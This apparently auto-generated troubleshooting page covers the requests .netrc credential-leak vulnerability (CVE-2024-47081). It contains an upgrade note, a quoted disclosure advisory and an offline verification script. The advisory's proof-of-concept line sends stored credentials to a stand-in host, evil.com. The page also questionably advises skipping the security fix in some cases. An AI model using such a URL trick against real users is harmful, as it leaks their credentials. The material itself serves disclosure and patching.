The Fix
pip install requests==2.32.4
Based on closed psf/requests issue #6964 · PR/commit linked
Production note: Most teams hit this during upgrades or environment changes. Roll out with a canary and smoke critical endpoints (health, OpenAPI/docs) before 100%.
@@ -236,13 +236,7 @@ def get_netrc_auth(url, raise_errors=False):
ri = urlparse(url)
-
- # Strip port numbers from netloc. This weird `if...encode`` dance is
- # used for Python 3.2, which doesn't support unicode literals.
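Review bot: the hunk is cut off after the two removed comment lines, so the `+` side (six lines shorter per the `-236,13 +236,7` header) that replaces the port-stripping logic is not visible and cannot be reviewed here. Per this page's fix description the lookup should now derive `host` from the parsed hostname rather than from `ri.netloc`; confirm the added lines do that, that the now-obsolete Python 3.2 `encode` dance is gone entirely, and that a plain port suffix (`http://example.com:8080/`) still resolves to `example.com`.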
Why This Fix Works in Production
- Trigger: a request to a URL whose userinfo part names a host for which .netrc holds credentials, as in the advisory's example `http://example.com:@evil.com/` (CVE-2024-47081).
- Mechanism: the pre-fix netrc lookup derived the host from the URL's netloc, so the userinfo portion (`example.com`) selected the credentials while the request itself went to the real hostname (`evil.com`).
- Why the fix works: the lookup now uses the parsed hostname only, so the credentials attached are always those of the host actually contacted (first fixed release: 2.32.4).
- If left unfixed, the leak is silent: the request succeeds and no error is raised, so it will not surface in logs or tests that only look for failures.
Why This Breaks in Prod
- Production symptom (often without a traceback): credentials stored in .netrc for one host are sent to a different host; the request itself succeeds, so there is no error to alert on.
Proof / Evidence
- GitHub issue: #6964
- Fix PR: https://github.com/psf/requests/pull/6965
- First fixed release: 2.32.4
- Reproduced locally: No (not executed)
- Last verified: 2026-02-09
- Confidence: 0.95
- Did this fix it?: Yes (upstream fix exists)
- Own content ratio: 0.36
Discussion
High-signal excerpts from the issue thread (symptoms, repros, edge-cases).
“So... will we have a release that contains those fixes? 🤔 It's been more than a week already”
“I would contact your vendor, this isn't an issue with Requests.”
“This issue does seem ongoing. Still getting the issue CVE-2024-47081 against version 2.32.4”
“Hi, please, https://github.com/psf/requests/pull/6965 is the fix for CVE-2024-47081?”
Failure Signature (Search String)
- CVE-2024-47081: Netrc credential leak in PSF requests library
- There does not yet seem to be an issue nor an advisory about CVE-2024-47081 which was recently disclosed on seclists.org - I'm thus copying the advisory here:
Error Message
Signature-only (no traceback captured)
Minimal Reproduction
From: Juho Forsén via Fulldisclosure <fulldisclosure () seclists org>
Date: Sat, 31 May 2025 06:30:50 +0000
The PSF requests library (https://github.com/psf/requests & https://pypi.org/project/requests/) leaks .netrc
credentials to third parties due to incorrect URL processing under specific conditions.
Issuing the following API call triggers the vulnerability:
requests.get('http://example.com:@evil.com/')
Assuming .netrc credentials are configured for example.com, they are leaked to evil.com by the call.
The root cause is
https://github.com/psf/requests/blob/c65c780849563c891f35ffc98d3198b71011c012/src/requests/utils.py#L240-L245
The vulnerability was originally reported to the library maintainers on September 12, 2024, but no fix is available.
CVE-2024-47081 has been reserved by GitHub for this issue.
As a workaround, clients may explicitly specify the credentials used on every API call to disable .netrc access.
Fix Options (Details)
Option A — Upgrade to fixed release (safe default, recommended)
pip install requests==2.32.4
Use when you can deploy the upstream fix. It is usually lower-risk than long-lived workarounds.
Fix reference: https://github.com/psf/requests/pull/6965
First fixed release: 2.32.4
Last verified: 2026-02-09. Validate in your environment.
When NOT to Use This Fix
- Do not apply this fix if your application depends on .netrc entries matching against the full netloc rather than the hostname alone; the fixed lookup keys on the hostname only.
Verify Fix
Re-run the minimal reproduction on your broken version, then apply the fix and re-run.
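The verification step above, and the netloc-versus-hostname mechanism described under "Why This Fix Works in Production", as an added example that is not code from this page or from the requests project: it models the pre-fix host selection the advisory describes (netloc split on ':') next to the hostname-based selection of the fix, runs both against a constructed .netrc written to a temporary file, and flags URLs where the two disagree. The function names, the dummy credential and the second sample URL are this example's own assumptions; the first URL is the one quoted in the advisory.

```python
"""Added example (not from the page or the requests project): reproduces the
netrc host-selection logic offline so the fix can be verified without any
network access. Every credential below is a constructed dummy."""
import netrc
import os
import tempfile
from typing import Optional, Tuple
from urllib.parse import urlparse

# Constructed .netrc content; "example.com" matches the advisory's example.
SAMPLE_NETRC = "machine example.com login alice password not-a-real-secret\n"


def legacy_netrc_host(url: str) -> str:
    """Host key used by the pre-2.32.4 lookup as the advisory describes it:
    the netloc with everything after the first ':' dropped. A userinfo
    section such as 'example.com:@evil.com' therefore yields 'example.com'."""
    return urlparse(url).netloc.split(":")[0]


def fixed_netrc_host(url: str) -> Optional[str]:
    """Host key used by the fixed lookup: the parsed hostname only, which is
    also the host the request is actually sent to."""
    return urlparse(url).hostname


def host_mismatch(url: str) -> bool:
    """True when the legacy key differs from the real destination host, i.e.
    when the old lookup could attach credentials for the wrong machine."""
    return legacy_netrc_host(url) != fixed_netrc_host(url)


def lookup_credentials(netrc_path: str, host: Optional[str]) -> Optional[Tuple[str, str]]:
    """Return (login, password) for host from the given netrc file, or None."""
    if not host:
        return None
    entry = netrc.netrc(netrc_path).authenticators(host)
    if entry is None:
        return None
    login, _account, password = entry
    return login, password


def verify_fix(url: str, netrc_text: str = SAMPLE_NETRC) -> dict:
    """Run both lookups against a temporary netrc file and report what each
    would have attached to a request for `url`."""
    # mkstemp creates the file owner-readable only, as a real .netrc should be.
    fd, path = tempfile.mkstemp()
    try:
        with os.fdopen(fd, "w") as fh:
            fh.write(netrc_text)
        return {
            "destination": fixed_netrc_host(url),
            "legacy_key": legacy_netrc_host(url),
            "legacy_creds": lookup_credentials(path, legacy_netrc_host(url)),
            "fixed_creds": lookup_credentials(path, fixed_netrc_host(url)),
            "mismatch": host_mismatch(url),
        }
    finally:
        os.unlink(path)


if __name__ == "__main__":
    for u in ("http://example.com:@evil.com/", "http://example.com:8080/api"):
        print(u, verify_fix(u))
```

For the advisory's URL the report shows `legacy_creds` populated, `fixed_creds` empty and `mismatch` True, which is exactly the pre-fix leak condition; for a plain port suffix both lookups agree. `host_mismatch` can also serve as a pre-flight guard on URLs taken from untrusted input while a requests version older than 2.32.4 is still deployed.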
Prevention
- Capture the exact failing error string in logs and tests so you can reproduce via a minimal script.
- Pin production dependencies and upgrade only with a reproducible test that hits the failing path.
Version Compatibility Table
| Version | Status |
|---|---|
| 2.32.4 | Fixed |
Related Issues
No related fixes found.
Sources
We don’t republish the full GitHub discussion text. Use the links above for context.